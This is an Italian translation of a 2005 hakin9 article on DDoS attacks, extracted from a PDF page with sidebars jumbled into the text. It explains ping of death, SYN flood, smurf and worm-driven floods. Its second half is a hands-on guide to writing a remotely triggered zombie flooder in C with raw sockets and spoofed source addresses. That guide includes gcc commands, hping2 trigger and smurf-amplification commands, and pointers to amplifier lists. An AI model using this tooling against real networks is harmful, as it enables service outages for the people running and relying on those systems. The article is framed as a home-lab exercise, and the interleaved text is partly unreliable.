Attacchi DDoS basi e aspetti pratici

Save this PDF as:
 WORD  PNG  TXT  JPG

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Attacchi DDoS basi e aspetti pratici"

Transcript

1 basi e aspetti pratici Andrzej Nowak, Tomasz Potęga Artykuł opublikowany w numerze 1/2005 magazynu hakin9. Zapraszamy do lektury całego magazynu. Wszystkie prawa zastrzeżone. Bezpłatne kopiowanie i rozpowszechnianie artykułu dozwolone pod warunkiem zachowania jego obecnej formy i treści. Magazyn hakin9, Software-Wydawnictwo, ul. Piaskowa 3, Warszawa,

2 basi e aspetti pratici Andrzej Nowak, Tomasz Potęga La funzione dell attacco DoS (Denial of Service) è di impedire o mettere in difficoltà accesso al servizio scelto. DDoS (Distributed Denial of Service) è un DoS eseguito da più fonti contemporaneamente. Qui presentiamo le tecniche utilizzate dagli hacker per eseguire questo tipo di attacchi. Basi Gli attacchi DDoS sono utilizzati da anni sia dagli script-kiddies, sia dai crackers. Nel mondo reale un esempio di un attacco DDoS può essere l inserimento di una gomma da masticare in un buco di serratura oppure lo spegnere l interruttore della corrente ai vicini, ma di regola le conseguenze non sono gravi. Nel mondo dei computer invece le conseguenze degli attacchi DoS o DDoS possono essere molto serie: dalle interruzioni di servizi importanti alle gigantesche perdite fi nanziarie. Alcuni metodi semplici Un attacco DoS meno avanzato è packet fl ood. L'aggressore sfrutta il fatto di avere una connessione più veloce di quella del bersaglio e lo colpisce con una serie di pacchetti (per esempio echo ICMP, quindi ping) bloccando completamente la sua connessione ad Internet. Se sul computer del bersaglio funziona, per es. un server web, gli internauti avranno dei seri problemi a stabilire un collegamento con esso. Esistono anche varianti di questo tipo d attacco più avanzate, per es. bloccando un computer con frammenti di pacchetti UDP (vedi Cornice Protocollo IP frammentazione). In Windows 95 era famosa la fragilità a questo tipo di attacco e anche agli altri per i quali si utilizzano pacchetti scorrettamente costruiti. Dei buoni esempi illustranti come si può provocare la caduta di un sistema remoto sono (un Dall articolo imparerai cosa sono e come funzionano gli attacchi DDoS, come in pratica si eseguono alcuni tipi di attacchi DDoS, come funzionano i protocolli TCP/IP, UDP e ICMP, come, usando i raw socket, scrivere i programmi che spediscono i pacchetti costruiti IP. Cosa dovresti sapere per capire la prima parte dell articolo che descrive le basi di DDoS, è necessaria la conoscenza basilare nell ambito del sistema Linux e del funzionamento della rete, per capire la seconda parte dell articolo che descrive la creazione del programma che esegue un attacco, è necessaria l esperienza nella scrittura dei programmi che si servono dell interfaccia delle porte di rete. 10

3 La nascita del protocollo IP Supponiamo di avere due computer con le schede di rete connesse tramite il cavo di rete (Fig. 1). Cosa succede quando dal computer A vogliamo mandare dati al computer B (per esempio la frase uno due tre prova microfono)? Nel computer A ai dati va aggiunto qualche byte che contiene alcune informazioni rilevanti. Una di queste è il numero della scheda di rete del computer al quale indirizziamo i dati. Questa sequenza (i dati + l intestazione) la chiameremo frame. La scheda di rete del computer B, che ha ricevuto il frame, confronta l indirizzo lì contenuto (cioè il contrassegno numerico della scheda di rete) con il suo. Se gli indirizzi corrispondono, dal frame viene rimosso l intestazione e i dati vengono trasmessi al sistema operativo il quale decide cosa farne. Questo meccanismo (utilizzato per esempio dal protocollo Ethernet) permette anche di connettere più di due computer. L indirizzo di destinazione del frame viene inserito nell intestazione, arriverà a tutti i computer. Ognuno poi confronterà questo indirizzo con il proprio per capire se siano effetivamente loro i destinatari. È anche possibile connettere un maggiore numero di reti tra loro, basta utilizzare dell hardware apposito, il quale trasmetterà i frame da un cavo all altro. Il problema sorgerà quando vorremo collegare insieme delle reti che addotteranno standard diversi. Primo potrebbe verificarsi un problema di indirizzamento (le reti possono usare indirizzi in formati diversi, e quindi che l indirizzo di uno standard non potrà essere elaborato nel frame di un altro). Secondo se le reti usano il meccanismo di costruzione di frame differenti (per esempio, in uno standard l indirizzo può essere collocato all inizio dell intestazione, in un altro alla fine), l idea di trasferimento puramente meccanico del frame da un cavo all altro può risultare pessima (il computer che riceverà il frame non sarà capace di comprenderlo). Terzo le reti possono avere un limite massimo di dimensione del frame. Per risolvere questi problemi viene usato il protocollo IP (ingl. Internet Protocol) il protocollo di base utilizzato per la comunicazione tramite Internet. po vecchi e poco complicati) attacchi ping of death e teardrop. Ping of death assomiglia semplicemente al pacchetto echo ICMP, ma la sua dimensione supera i 64kB, quindi il pacchetto viene frammentato. L ultimo frammento non entra nel buffer che il sistema dedica al suo ricevimento e quindi dopo la ricezione del pacchetto il sistema si blocca oppure fa reset. Teardrop utilizza anche le imperfezioni nel meccanismo della frammentazione dei pacchetti IP. Quando la dimensione del pacchetto IP supera la grandezza maggiore sostenibile (ingl. Maximum Transfer Unit), il pacchetto viene diviso in parti nelle quali viene registrato un offset dei dati nel pacchetto originale. Se gli offset sono collocati nel modo in cui i frammenti del pacchetto si sovrappongono dopo essere riuniti, l effetto è simile a quello nel caso del ping of death. Un tipo di attacco DoS molto famoso, perché più effi cace, è quello SYN. Esso consiste nell utilizzo del limite del sistema remoto per le connessioni aperte a metà e dei limiti dell'hardware del sistema. Per capire cosa sono le connessioni aperte a metà guardiamo prima un metodo nel quale due computer stabiliscono una connessione TCP (vedi Three way handshake e Fig. 5). Il server rispedisce il pacchetto SYN+ACK all indirizzo sorgente indicato nel pacchetto SYN anche se esso è falso. Se capita su un computer funzionante, questo da parte sua può rispondere con il pacchetto RST (non avevo richiesto nessun collegamento). Gli indirizzi spoofati solitamente sono scelti in modo di stabilire quali computer non sono funzionanti o sono inesistenti. In questo caso il server deve aspettare il pacchetto ACK. Un semplice attacco di tipo SYN non ha bisogno di tanta banda, è soprattutto una minaccia alla stabilità del computer che è stato attaccato. La conseguenza della comparsa di una connessione aperta a metà è l allocazione delle risorse (per es. memoria, buffer). Se non si ha una connessione piena, queste risorse vanno sprecate. Effetti spettacolari di questi attacchi, li hanno sperimentati nel 2001 tanti portali americani, tra gli altri Yahoo, ebay, CNN ed etrade. Oggi i server possono sopportare e ricevere più connessioni aperte a metà di prima. Un attacco semplice SYN non basta per paralizzare il sistema, ma è suffi ciente che un cracker usi un numero maggiore di computer, le risorse del server attaccato siano comunque limitate. Attacchi distributed DoS Un attacco DDoS non è altro che un attacco DoS eseguito da tanti computer insieme. In quanto un attacco singolo DoS si riesce a scoprire e fermare, per un attacco DDoS non c è nessuna linea di difesa predisposta. Esso è quasi sempre incredibilmente effi cace e la sua sorgente è diffi cile da scoprire. Un esempio standard di un attacco di questo tipo è distributed packet fl ood, che consiste nell invio al computer vittima di un grande numero di pacchetti da tanti computer contemporaneamente. Anche se il sistema remoto non esaurisce le sue risorse rispondendo alle richieste può, nonostante tutto, risultare che i computer della sottorete non siano preparati a tutto questo traffi co. Fig. 1: I due computer connessi in rete scambiano il frame di Ethernet 11

4 Basi Se il sistema attaccato ha un collegamento più veloce, e gli aggressori non sono tanti, le conseguenze non saranno necessariamente serie. Se comunque abbiamo a che fare con degli attacchi su larga scala, p. es. provocati dai worm di Internet, non si può fare tanto per difendersi. Un altro esempio interessante dell attacco DDoS è smurf. Il nome proviene dal primo programma che ha utilizzato questa tecnica. Ogni sottorete IP ha il suo indirizzo di ricezione (broadcast), al quale vanno spediti i messaggi pubblici. Teoricamente al comunicato broadcast può rispondere qualsiasi macchina nell ambito di una data sottorete e quindi possono farlo tutte. Se si riesce a immettere all indirizzo broadcast un pacchetto echo ICMP (ping) con un pacchetto sorgente IP spoofato, tutte le risposte saranno indirizzate ad un solo computer. Un'altra volta abbiamo a che fare con attacchi possibili a causa di router mal confi gurati. I pacchetti inviati all indirizzo broadcast non dovrebbero essere fatti entrare dall'esterno alla rete, perché non hanno il diritto di trasmettere nessuna informazione utile. Le reti mal confi gurate quindi non fanno altro che rafforzare un attacco. Basta un computer che attacca inviando i pacchetti all indirizzo broadcast per paralizzare un router oppure un sistema remoto. Un attacco smurf è comunque facile da fermare. Esso utilizza il Fig. 2: Protocollo IP indirizzamento Protocollo IP indirizzamento Per risolvere il problema di indirizzamento, accennato in La nascita del protocollo IP, ogni computer che utilizza il protocollo IP ha un indirizzo non correlato con il numero fisico della scheda di rete per esempio Questo indirizzo (insieme con diverse informazioni utili) va situato all inizio dei dati che devono essere trasmessi come intestazione IP. La porzione dei dati contenenti l intestazione IP, la chiamiamo pacchetto IP. Se utilizziamo Ethernet questo pacchetto va inserito nel frame ethernet (aggiungiamo cioè al suo inizio un'intestazione che conterrà, tra l altro, l indirizzo fisico della scheda di rete del computer al quale inviamo i dati), dopodiché lo trasmettiamo in rete. In questo modo i dati verranno accompagnati da due intestazioni l intestazione IP e l intestazione Ethernet. Per trasmettere dati tra due computer che si trovano in reti diversee che utilizzano standard diversi (sulla Fig. le macchine 1 e 5) dobbiamo utilizzare la macchina che è connessa a tutte e due le reti (7). Nei dati inseriamo il pacchetto IP che va immesso nel frame della prima rete. Inviamo il frame alla macchina 7 la quale dopo averlo ricevuto estrae il pacchetto IP. Dopo aver decifrato l indirizzo IP il computer 7 sa che il pacchetto è stato indirizzato al computer 5, quindi lo trasmette in un frame della seconda rete e lo spedisce al computer 5. protocollo ICMP il quale si può bloccare sul router, ma è stato creato un variante dell attacco smurf chiamato fraggle che si basa sui pacchetti UDP echo. L utilizzo del protocollo UDP dà maggiori possibilità di successo all aggressione, perché questo protocollo viene utilizzato da tante applicazioni e spesso non può essere bloccato. La caduta di massa I rappresentanti classici degli strumenti della caduta di massa in Internet sono i worm. Mentre durante gli anni il principale obiettivo era quello di diffondersi rapidamente e l effetto DoS era solo un effetto collaterale, negli ultimi tempi invece sono comparsi dei programmi che hanno come scopo quello di eseguire un attacco DDoS. Ricordiamo i casi più famosi: Protocollo IP frammentazione Per risolvere, già accennato in La nascita del protocollo IP, il problema di invio dati tra le reti con una differente dimensione del frame, si fa uso della frammentazione dei pacchetti IP. Quando un pacchetto IP di grande dimensione deve essere spedito ad una rete che non permette i frame così grandi, questo viene suddiviso in due pacchetti più piccoli. Per permettere al computer destinatario di mettere tutte e due le parti in un insieme, ogni pacchetto IP è fornito di un identificatore nell intestazione (da 1 a 65536), un informazione sulla continuità del pacchetto (cioè se il destinatario si dovrà aspettare la ricezione di altri frammenti) e un'informazione sulla posizione originaria (prima della frammentazione) del frammento nel pacchetto. Dopo la frammentazione del pacchetto in due pezzi più piccoli, tutti e due avranno lo stesso valore nel campo IPID (identificatore). Il primo di essi conterrà una flag more fragments (informa che seguirà la seconda parte del pacchetto), il secondo un campo offset che includerà il come è stata effettuata la frammentazione e la sua fine. 12

5 La composizione dell intestazione IP La composizione del pacchetto IP è presentata nella Fig. 3. Questo schema va letto da sinistra a destra e dall alto verso il basso. Esempio: ogni pacchetto è composto da 4 bit (sulla Fig. è 0 3 bit), che indicano la versione del protocollo IP seguiti da i quattro bit che indicano la lunghezza del pacchetto etc. Il pacchetto IP contiene tutte le informazioni necessarie alla consegna del datagramma (del pacchetto). Affinché il pacchetto sia accettato correttamente deve contenere i dati giusti e corrispondere alla dimensione riportata nell intestazione essa non riguarda i dati contenuti nel pacchetto. Il campo lunghezza dell intestazione indica il numero dei caratteri di 32 bit nell intestazione, lunghezza totale signifi ca la lunghezza totale del datagramma in byte. Il campo protocollo... fornisce le informazioni sul protocollo d alto livello e consente al destinatario di leggere il pacchetto. Il campo versione indica la versione del protocollo IP (di solito 4 o 6). La somma di controllo Per calcolare la somma di controllo del pacchetto è necessario un accumulatore di 32 bit, nel quale facciamo la somma delle seguenti parole di 16 bit. Quando otteniamo un valore che supera il limite dei 16 bit, al risultato finale dei 16 bit aggiungiamo i contenuti maggiori dei 16 bit dell accumulatore. Se ancora una volta ci troviamo con una eccedenza, lo aggiungiamo alla somma che sottoporremo alla sottrazione e quindi otterremo la somma di controllo finale. Code Red si avvaleva della mancanza di una patch all interno di Microsoft IIS; gli effetti collaterali del suo agire (la scansione degli indirizzi nella ricerca di altri bersagli) furono consistenti Fig. 3: La composizione del pacchetto IP Fig. 4: Attacco di tipo smurf disturbi nel lavoro della rete mondiale. Nimda diffuso in più di un modo; come un fi le virus di cartella tradizionale, tramite gli allegati di posta, sfruttando la mancanza di una patch in IIS e anche tramite portamento del contenuto errato delle pagine web. Gli effetti del suo funzionamento furono grandi disturbi nell utilizzo e nel funzionamento di Internet. Blaster si diffondeva usando il buco nel sottosistema RPC dei sistemi Windows basati sul kernel NT; ha provocato danni notevoli, Spoofing Ogni pacchetto IP contiene nell'intestazione l indirizzo del computer mittente. Teoricamente questo indirizzo dovrebbe indicare il computer dal quale proviene il pacchetto. In pratica è anche possibile cambiare questo indirizzo con uno completamente diverso e il pacchetto, nonostante tutto, sarà spedito al destinatario. Questo avviene per colpa o per una errata confi gurazione dei router i quali non dovrebbero trasmettere pacchetti che provengono dalle reti estranee. Lo spoofing provoca delle diffi coltà per risalire al vero mittente del pacchetto. ma non un traffi co critico aggiuntivo nella rete. Il suo compito principale era di eseguire un attacco DDoS di tipo SYN verso la pagina web windowsupdate.com. MyDoom si diffondeva usando gli allegati della posta e del sistema P2P Kazaa. Il 1 febbraio 2004 ha iniziato con successo un attacco alla pagina (semplice HTTP GET). Da dove arrivano gli zombie? Per un attacco di successo DDoS c è bisogno di tante macchine che attaccano contemporaneamente. In che modo un aggressore costringe un grande numero di computer ad eseguire un comando? Ci sono due metodi: la conquista del controllo totale del computer, sfruttando di una falla nel sistema di sicurezza (come per esempio Blaster) oppure utilizzando uno specifico comportamento messo a disposizione da un sistema o da un protocollo dati (per esempio smurf). 13

6 Fig. 5: La composizione del pacchetto IP e TCP (semplifi cato) Fig. 6: La composizione del pacchetto TCP Three way handshake Il protocollo IP non dispone di metodi che permettono di assicurarsi che il pacchetto spedito sia realmente arrivato al destinatario. Se vogliamo avere questa sicurezza dobbiamo usufruire del protocollo TCP. TCP permette di ampliare le possibilità del protocollo IP. All interno dei pacchetti IP vanno messi i pacchetti con intestazione TCP (vedi Fig. 5 parte destra). Ognuno di questi pacchetti è composto da un pacchetto dati e da un intestazione contenente le informazioni necessarie sui dati che vanno inviati. Quando computer A spedisce al computer B un pacchetto di dati, questo gli può rispondere: OK, confermo la ricezione del pacchetto con numero di sequenza La stabilizzazione della connessione TCP tra i due computer comincia con accordo sul valore iniziale del numero di sequenza: A trasmette a B un pacchetto con l'informazione sul valore iniziale dal quale comincerà a numerare i suoi pacchetti (pacchetto SYN), B risponde con un pacchetto nel quale conferma la ricezione del pacchetto ricevuto (pacchetto ACK), B invia ad A un pacchetto con l informazione sul valore iniziale dal quale comincerà a numerare i suoi pacchetti (pacchetto SYN), A risponde con un pacchetto nel quale conferma la ricezione del pacchetto ricevuto (pacchetto ACK). I punti 2 e 3 possono anche avvenire contemporaneamente B può in un pacchetto confermare la ricezione del pacchetto ricevuto da A (ACK) e consegnare il suo numero iniziale di sequenza (SYN) inviando un pacchetto segnato di solito come SYN+ACK. La procedura di connessione è composta quindi da tre passi (vedi Fig. 7): Basi A invia a B un pacchetto SYN, B risponde con SYN+ACK, A risponde con pacchetto ACK. Fig. 7: Three way handshake nella versione giusta e sbagliata Questa procedura è chiamata Three way handshake (triplo scambio di mano). Per i particolari vedere le RFC 791 e RFC

7 Protocollo ICMP Internet Control Message Protocol è un altro (accanto a TCP) protocollo di rete che funziona ad un livello superiore all'ip. I pacchetti ICMP servono per verifi care se un dato computer è raggiungibile, per informare sui problemi di comunicazione ecc. I più diffusi sono due tipi di pacchetti ICMP: ICMP echo request e ICMP echo reply. Quando spediremo ad un indirizzo un pacchetto ICMP echo request il destinatario dovrebbe (non è obbligato) rispondere con un pacchetto ICMP echo reply. In questo modo (per esempio utilizzando lo strumento ping) possiamo controllare se un computer è raggiungibile. La composizione del pacchetto ICMP è mostrata nella Fig. 8. Sono stati scritti molti programmi i quali trasformano i personal computer in schiavi eseguenti ogni comando dell aggressore. I più famosi fi nora sono Trinoo, Tribe Flood Network, Stecheldracht, Shaft e TFN2000. Anche se questi software sono facili da scoprire con molti programmi antivirus, vengono comunque utilizzati e sono organizzati in rete gerarchica aspettando istruzioni su una porta specifi ca o nel canale della rete IRC. La maggior parte delle reti zombie il cui scopo principale era di eseguire un attacco DDoS venivano installate manualmente. Oggi questa mansione, l hanno acquisita i worm. Blaster ha infettato 600 mila computer circa, nel caso di MyDoom si parlava di un milione di zombie. Vale anche la pena di accennare che esiste un fenomeno simile ad un Protocollo UDP User Datagram Protocol, è simile a TCP o ICMP, funziona ad un livello superiore all'ip. Proprio come il protocollo TCP permette di stabilire la porta alla quale inviare i dati, ma è molto più semplice. UDP è un protocollo senza collegamento i pacchetti inviati possono non arrivare all obiettivo oppure arrivare in una sequenza diversa dalla quale sono stati inviati (in UDP non si conferma la ricezione dei dati). Fig. 8: La composizione del pacchetto ICMP attacco, anche se nonostante tutto, esso conduce ad una risposta negativa nell accesso ai servizi parliamo di slashdotting. Quando un famoso servizio di Internet mette un link a qualche pagina nella rete, la grande massa dei lettori non vede ora di vederla. Di solito la pagina non è molto conosciuta e l amministratore del server sul quale essa si trova non si aspetta una situazione di crisi. Nel momento dell improvvisa crescita della popolarità il sistema non è capace di servire tutte le richieste e rifi uta l accesso al servizio (HTTP) nonostante gli utenti non siano dei malintenzionati. Il nome di questo effetto deriva da un servizio americano Slashsdot (http://www.slashdot.org) il quale offre tanti link. Eseguire un attacco DDoS Proviamo ad eseguire un attacco DoS e qualche attacco DDoS in ambiente domestico. Ci serve una rete LAN e qualche computer. Per monitorare gli effetti dell attacco possiamo utilizzare strumenti quali iptraf, tcdump o ethereal. Per riprodurre in pratica gli argomenti che stiamo discutendo scriveremo un semplice programma dimostrativo. Le sue copie saranno installate sui computer dai quali partirà l attacco. Il segnale che consentirà al programma di iniziare l'attacco sarà la ricezione del pacchetto preparato. Come risposta il programma inizierà l invio dei pacchetti ICMP (con lo scopo di eseguire un attacco ICMP fl ood) oppure dei pacchetti SYN (attacco SYN fl ood). Quale tipo di pacchetti saranno inviati dipende dal nome utilizzato per avviare il programma. Dopo aver compilato il programma dovremo copiare la cartella eseguibile sotto i due nomi (syn_fl ood e icmp_fl ood) oppure creare due collegamenti simbolici conducenti alla cartella. Gli indirizzi sorgenti saranno estratti a caso utilizzeremo lo spoofi ng. Guardiamo ora l'algoritmo del funzionamento del programma synipmc.c presentato nella Fig. 9. Il programma comincerà a funzionare dal momento della verifi ca del nome utilizzato per avviarlo. Successivamente entrerà in standby, modalità dalla quale ascolterà i pacchetti in arrivo. Se troverà un pacchetto che conterrà il fl ood_indirizzo_ip, sarà richiamata la funzione corrispondente di quel tipo e l invierà all indirizzo_ip. Scriviamo programma Siccome il sistema operativo si occupa di servizi TCP/IP, la maggior parte dei programmi non intervengono nei titoli dei dati inviati e ricevuti. Se vogliamo, ad esempio cambiare l indirizzo del mittente, dobbiamo da soli costruire tutto il pacchetto insieme al titolo. Preparato in questo modo il pacchetto occorre ora spedirlo. Per fortuna il sistema oltre ai protocolli normali come PF _ INET, UDP o TCP, offre anche i raw socket. Utilizzando questo tipo di protocollo l utente è obbligato alla costruzione e all analisi dei pacchetti. Bisogna sottolineare che non tutti i sistemi operativi permettono di creare un protocollo aperto, i sistemi MS Windows sono limitati da questo punto di vista, quindi realizzeremo il nostro esempio utilizzando Linux. Prima di cominciare il lavoro suggeriamo ai lettori meno abili di approfondire la tecnica generale di programmazione delle porte. Socket e pacchetto IP Per creare un raw socket, come argomento alla funzione socket() mettiamo SOCK _ RAW. Il campo del 15

8 Fig. 9: Lo strumento per eseguire un attacco DDoS Basi protocollo può prendere il numero identifi cativo da uno qualsiasi dei protocolli IP. Può anche prendere il valore IPPROTO _ RAW il socket non è in questo caso abbinato ad un protocollo concreto e praticamente si può confi gurare liberamente in tutti i campi dell intestazione IP. Alcuni di essi (la lunghezza, la somma di controllo) sono comunque composti dal kernel, altri come per esempio indirizzo sorgente soltanto quando sono azzerati. A parte alcune eccezioni, il sistema non cambia il contenuto, né dell intestazione, e nemmeno i dati trasmessi dentro un pacchetto. Quindi la creazione del socket può essere rappresentata così: int sock=socket(pf_inet, SOCK_RAW, IPPROTO_RAW); In questo momento si può anche usare sendto() per inviare i dati: sendto(sock, pacchetto, dimensione del pacchetto,...); I protocolli IPPROTO _ RAW non possono essere utilizzati per ricevere dei dati in questo caso bisogna stabilire un concreto protocollo IP (come ICMP), oppure usare i socket PF _ PACKET. Per spedire il pacchetto dobbiamo prima costruirlo. In questo caso vale la pena utilizzare i file di apertura dalla sottocartella netinet tra questi troviamo ip.h, ip_icmp.h e tcp.h. Contengono le definizioni delle strutture corrispettive alle intestazioni dei protocolli corrispondenti. In questo modo invece di utilizzare spostamenti diretti possiamo servirci dei nomi simbolici molto più facili da leggere. Volendo configurare il campo Time To Live, cambiamo il nono byte del pacchetto IP: packet[8]=64; Non c è comunque bisogno di cercare dei valori offset, essi sono nascosti nel struct iphdr. ip_header->ttl=64; Cominciamo allora la creazione dell intestazione IP. Abbiamo bisogno di un buffer che conserverà il pacchetto e l indicazione del suo inizio: char packet[dimensione]; struct iphdr *ip_header =(struct iphdr *) packet; Ora vogliamo spedire un pacchetto standard della versione 4, attualmente la più popolare, del protocollo IP (IPv4): ip_header->version=4; con la lunghezza minima di 20 byte quindi di cinque parole da 32 bit: 16

9 ip_header->ihl=5; Dobbiamo necessariamente dare un valore al campo TTL, per permettere al pacchetto di fare un lungo viaggio in Internet: ip_header->ttl=64; Rimane quindi da confi gurare gli indirizzi sorgente e di destinazione: ip_header->saddr = sorgente ip_header->daddr = bersaglio Gli indirizzi IP qui vengono trattati come i numeri da 32 bit senza segno (corrispondenti al tipo u _ int32 _ t). Come abbiamo già accennato quando lasceremo il sorgente azzerato, il sistema metterà in questo posto il vero IP del mittente. Ora basta che il pacchetto sia trasmesso e al resto ci penserà il kernel. La tappa successiva dovrà essere la realizzazione dell'intestazione del protocollo di livello superiore. Pacchetto ICMP Cominciamo dalla richiesta ICMP echo request. Essa è utilizzata dal programma ping il sistema funzionante dovrebbe rispedire il pacchetto echo reply all indirizzo del mittente. Ricordiamo che l indirizzo sarà falso: l effetto sarà un sovraccarico aggiuntivo del computer attaccato. Confi guriamo l indicatore dell intestazione ICMP, sappiamo già che si trova subito dopo l intestazione IP: struct icmphdr *icmp_header =(struct icmphdr *) (packet + sizeof(struct iphdr)); Compiliamo il campo del tipo, grazie ai numeri fi ssi da ip_icmp.h non dobbiamo nemmeno sapere che la richiesta ha il numero 8. icmp_header->type=icmp_echo; Successivamente si presenterà un problema: la somma di controllo ICMP. Possiamo contarla similmente al suo corrispondente nell intestazione IP, ma possiamo farcela senza calcoli aggiuntivi. Vogliamo inviare un pacchetto, il più semplice possibile, composto soltanto dal campo tipo. Quindi possiamo supporre che il valore di questa somma di controllo sarà la semplice negazione ICMP _ ECHO: icmp_header->checksum=~icmp_echo; In questo momento abbiamo a disposizione un pacchetto corretto ICMP pronto da spedire. Pacchetto TCP È arrivato il momento di occuparci di un altro elemento il pacchetto TCP con la confi gurazione SYN. Cominciamo come sempre da un indicatore per l intestazione. Anche in questo caso lo troveremo subito dopo l intestazione IP: struct tcphdr *tcp_header =(struct tcphdr *) (packet + sizeof(struct iphdr)); Dobbiamo decidere il protocollo concreto della porta TCP, anzi, due porte: sorgente e di destinazione. Essa dovrebbe essere aperta sul computer che vogliamo attaccare, ma vogliamo far fi nta di stabilire la connessione normale, quindi in tutti e due i casi può essere utilizzata la stessa porta. Il richiamo della funzione htons() ci assicurerà l'adeguata successione dei byte al numero di porta di 16 bit: tcp_header->dest = tcp_header->source = htons(numer); La fl ag SYN deve essere attiva: tcp_header->syn=1; Il campo data offset è un calcolo camuffato della lunghezza del titolo ancora una volta 20 byte (5 parole): tcp_header->doff=5; Un ultima tappa sarà il calcolo della somma di controllo. Dobbiamo collocarla nel tcp _ header->check questo campo è stato chiamato diversamente che nel ICMP. Possiamo cominciare ad effettuare l attacco altri elementi rimanenti dell intestazione, li possiamo lasciare azzerati. Controllo remoto Sappiamo già come creare i pacchetti che vanno usati per l'attacco. È ora di preparare il meccanismo di controllo. Per la comunicazione saranno utilizzati i pacchetti ICMP. Li riceveremo tramite i protocolli aperti, ma questa volta confi gurando il protocollo: int listen_sock = socket(pf_inet, SOCK_RAW, IPPROTO_ICMP); Ora possiamo ricevere in standby i pacchetti ICMP in arrivo: int len=read(listen_sock, buffor, dimensione); L istruzione dell attacco sarà la sequenza inserita all interno dei dati: flood-a.b.c.d La presenza della parola fl ood all inizio dei dati ICMP rappresenta il comando di decodificazione dell indirizzo IP che si trova dopo il trattino (-) e l inizio dell attacco. Il più breve indirizzo IP scritto in questo modo occupa 7 byte, il più lungo 15. Aggiungendo a questo la dimensione delle intestazioni (di solito saranno 20 byte dell intestazione IP e 8 byte dell intestazione ICMP) otterremo il primo criterio secondo il quale possiamo decifrare i dati ICMP in arrivo. Se la dimensione sarà giusta, possiamo cercare il fl ood, dopo di che possiamo aspettarci l indirizzo. Per la sua conversione è molto utile la funzione standard inet _ aton(). Il campo s _ addr della struttura in _ addr, che permetterà a questa funzione di restituire gli esiti non è altro che l indirizzo IP della vittima pronto per essere inserito nell'intestazione: struct in_addr addr; inet_aton( , &addr);... flood(..., addr.s_addr,...); 17

10 # telnet indirizzo.bersaglio 6000 Trying indirizzo.bersaglio... telnet: connect to address indirizzo.bersaglio: Connection timed out Fig. 10: Attacco SYN Per inviare un comando del genere basta un semplice programma ping che sarà capace di aggiungere i dati al pacchetto. In questo modo però ci saranno dei limiti connessi: i dati possono avere il massimo di 16 bytes, ma bisogna darli in forma esadecimale. Possiamo comunque utilizzare il programma hping2 (funziona per qualsiasi pacchetto TCP/IP). Tra le tante opzioni che esso offre c è anche un metodo per collocare i dati nel pacchetto ICMP. Per questo serve il comando --sign catena (abbreviazione -e): # hping2 --icmp --count 1 --sign \ flood-indirizzo.bersaglio \ indirizzo.agente Realizziamo un attacco Per eseguire un attacco SYN occorre scrivere un programma più complicato: # gcc -o syn synicmp.c e successivamente farlo funzionare su ogni computer remoto. Servendosi del commando hping2 inviamo le informazioni sul bersaglio. Gli effetti sotto forma di connessioni rifi utate si vedono nel log dmesg sul computer della vittima (vedi Fig. 11). Proviamo a collegarci con la porta attaccata riceveremo un accesso negato. Per monitorare gli effetti dell attacco si possono utilizzare gli strumenti iptraf (per ICMP fl ood, smurf) e ethereal (per SYN), bisogna comunque ricordarsi che durante l attacco SYN ethereal smetterà di rispondere ai comandi perché sarà occupato a raccogliere i dati sulle connessioni. L effetto dell attacco SYN nel programma ethereal è rappresentato nella Fig. 10. Per quanto SYN fl ood da un collegamento di 128 bit non provocava il blocco del sistema durante i test, ma solo il rifi uto dell accesso al servizio, sorgenti con i collegamenti di 128 bit hanno provocato la scomparsa di qualsiasi segno di vita da parte del sistema stesso. Attacco ICMP Per realizzare un attacco ICMP bisognerebbe complicare il programma nel seguente modo: # gcc -o icmp synicmp.c Per iniziare l'attacco inviamo il pacchetto ICMP adeguatamente formulato utilizzando lo strumento hping2. Se vogliamo attivare insieme tutti gli zombie contemporaneamente in tutta la sottorete, inviamo il pacchetto ICMP non ad un solo indirizzo, ma al broadcast. # hping2 - icmp - count 1 - sign \ flood-indirizzo.bersaglio \ indirizzo.broadcast Basi Fig. 11: L effetto dell attacco SYN Sia gli attacchi ICMP realizzati utilizzando il nostro strumento, sia quelli di tipo smurf utilizzando hping2 (dai computer con le connessioni veloci) provocavano soltanto un aumento di carico del computer della vittima, un notevole calo della qualità di trasmissione e il rallentamento del 30 40% della connessione di 10Mbit. L attacco smurf differenzia poco da quello descritto sopra. Esso esige comunque una banda più larga del- 18

11 l aggressore perché invia una marea di pacchetti agli indirizzi broadcast delle diverse reti. Questa azione è facile da eseguire usando nuovamente hping2. # hping2 -icmp -i 1u \ -a indirizzo.bersaglio \ indirizzo.sottorete.di supporto Il parametro -i 1u ordina l invio dei pacchetti ogni microsecondo, l opzione -a indirizzo.bersaglio invece configura l indirizzo sorgente dei pacchetti all indirizzo della vittima in questo modo le arrivano risposte dalla rete di supporto. Come prima, sono necessari i privilegi dell utente root perché ad un utente qualsiasi non è permesso di cambiare le intestazioni. La chiave degli attacchi di tipo smurf è il trovare il supporto delle reti. Qualche anno fa esistevano più reti aperte e la ricerca di trasmettitori durava relativamente poco. Oggi bisogna sforzarsi di più per trovare un gruppo adeguato di computer. Può esserci d aiuto in questo caso la lettura del sito sul quale si trovano indirizzi dei più grandi amplificatori smurf in Internet. Gli effetti, similmente come nel caso dell attacco ICMP, si possono osservare utilizzando iptraf (il numero dei pacchetti ICMP drasticamente vasto). In rete Il tempo di risposta ai ping semplici dovrebbe aumentare a causa del sovraccarico della banda (collegamento) e del processore o, nei casi più estremi, la risposta potrebbe non arrivare mai. Il metodo alternativo I pacchetti presentati si possono generare utilizzando anche il programma sendip, che va avviato dalla linea di comando. In questo caso non c è bisogno di scrivere il programma vero e proprio, ma esistono molti lati negativi: sendip crea un solo pacchetto, bisogna dargli un indirizzo spoofato e non c è la possibilità di controllo remoto. Troveremo i pacchetti RPM ed i sorgenti sendip all indirizzo http: //www.earth.li/projectpurple/progs/ sendip.html. Il formato completo dell avvio del programma è: # sendip [parametri del modulo] \ indirizzo_host Sendip dà la possibilità di costruire diversi tipi dei pacchetti di dati, anche TCP/IP o ICMP. Ad ogni protocollo corrisponde un frammento di codice caricato separatamente il modulo. Facciamo la scelta utilizzando l opzione -p. I nomi dei moduli protocollo UDP, protocollo IP, protocollo ICMP, protocollo TCP, un piccolo compendium riguardante TCP, IP e UDP, le posizioni Cisco riguardanti la difesa dagli attacchi SYN, un articolo sul tema della preparazione TCP/IP alla difesa dagli attacchi SYN, l autore Mariusz Burdach, una guida abbastanza competente sul tema DDoS. Un archivio delle descrizioni interessanti delle tecniche precedenti e degli strumenti DDoS: un compendium della conoscenza sul tema DDoS dell anno corrispondono ai nomi dei protocolli. Ricordiamoci che TCP ed IP sono due 